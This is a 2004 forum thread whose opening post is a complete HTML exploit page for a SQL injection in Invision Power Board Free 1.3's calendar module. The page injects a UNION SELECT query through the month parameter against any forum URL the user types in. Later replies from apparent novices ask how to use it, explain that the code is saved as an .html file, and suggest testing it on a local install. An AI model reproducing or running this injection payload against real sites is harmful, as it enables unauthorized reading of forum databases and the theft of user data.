Forums: Invision Power Board Free 1.3 Final - Forums

Jump to content

Page 1 of 1
  • You cannot start a new topic
  • You cannot reply to this topic

Invision Power Board Free 1.3 Final SQL Injection Exploit

#1 User is offline   GaLiaRePt 

  • Private First Class
  • Icon
  • Group: Members
  • Posts: 77
  • Joined: 30-July 03

Posted 04 January 2004 - 06:54 AM

--------------------IPBexploit.html-------------------- 


<html> 
<head><title> 
Invision Power Board Free 1.3 FINAL SQL Injection Problems 
</title></head> 
<body> 
<form action='/index.php?act=calendar' method='post' 
onsubmit="this.m.value='2 )) UNION 
'+this.request.value+'#';this.action=this.url.value+this.action;"> 
<b>IPB directory URL :</b> <input type='text' size='45' name='url' 
value='http://forum.target.com'><br><br> 
<b>SQL SELECT REQUEST :</b> <input type='text' size='80' name='request' 
value='SELECT * FROM ibf_calendar_events'><br><br> 
<u>Attention :</u> The request result MUST have this structure :<br><br> 
INT,INT,INT,INT,INT,STR,STR,STR,INT,INT,INT,INT,INT,INT,CHAR(2),INT,INT, 
INT,INT,STR,STR<br><br> 
<input type='hidden' name='y' value='2004'> 
<input type='hidden' name='m'> 
<input type='submit' value='Execute'> 
</form> 
<br><br><br> 
<p align="right">A patch can be found on <a 
href="http://www.phpsecure.info" target="_blank">phpSecure.info</a>.<br> 
For more informations about this exploit : 
<a href="http://www.security-corporation.com/advisories-025.html" 
target="_blank"> 
Security-Corporation.com</a></p> 
</body> 
</html>



--------------------IPBexploit.html--------------------

Source here
0

#2 User is offline   FiStEh 

  • Private First Class
  • Icon
  • Group: Members
  • Posts: 58
  • Joined: 30-November 03

Posted 04 January 2004 - 10:12 AM

Thanky muchly. but im not too sure as to the function of this. <_<
0

#3 Guest_ara_*

  • Group: Guests

Posted 04 January 2004 - 09:07 PM

heh isnt this the exact thing this board is running on? hopefully patched by now ;)
0

#4 Guest_Iced_Eagle_*

  • Group: Guests

Posted 08 February 2004 - 05:56 PM

FiStEh: copy and paste that code into like notepad and save it as a .html

I wish I could know SQL so I could test it.
0

#5 User is offline   nubela 

  • Private First Class
  • Icon
  • Group: Members
  • Posts: 22
  • Joined: 21-January 04

Posted 08 February 2004 - 06:01 PM

lol. hope this xploit doesn affects this forum.
anyway, can ya elaborate on the vulnerabilities?

and wad's the fucntion of the xploit?
0

#6 Guest_Iced_Eagle_*

  • Group: Guests

Posted 08 February 2004 - 06:07 PM

*edit* A vulnerability has been discovered in the sources/calendar.php file
that allows unauthorized users to inject SQL commands.

*edit2* I think I compiled that wrong or something... cause whenever I input a webaddress and I hit execute it goes back to C:/index.php

help?
0

#7 User is offline   Steffan 

  • Private First Class
  • Icon
  • Group: Members
  • Posts: 66
  • Joined: 08-September 03

Posted 09 February 2004 - 12:44 AM

Iced_Eagle, on Feb 9 2004, 02:07 AM, said:

*edit2* I think I compiled that wrong or something... cause whenever I input a webaddress and I hit execute it goes back to C:/index.php

help?

U compile it ?????????????? :unsure:

U mean U execute it ?!!! install a Board on U CPU and let it run against it ;)

C'ya
0
Page 1 of 1
  • You cannot start a new topic
  • You cannot reply to this topic

1 User(s) are reading this topic
0 members, 1 guests, 0 anonymous users

  • Share



Our Sponsors:


SwiftLayer Affiliate Web Hosting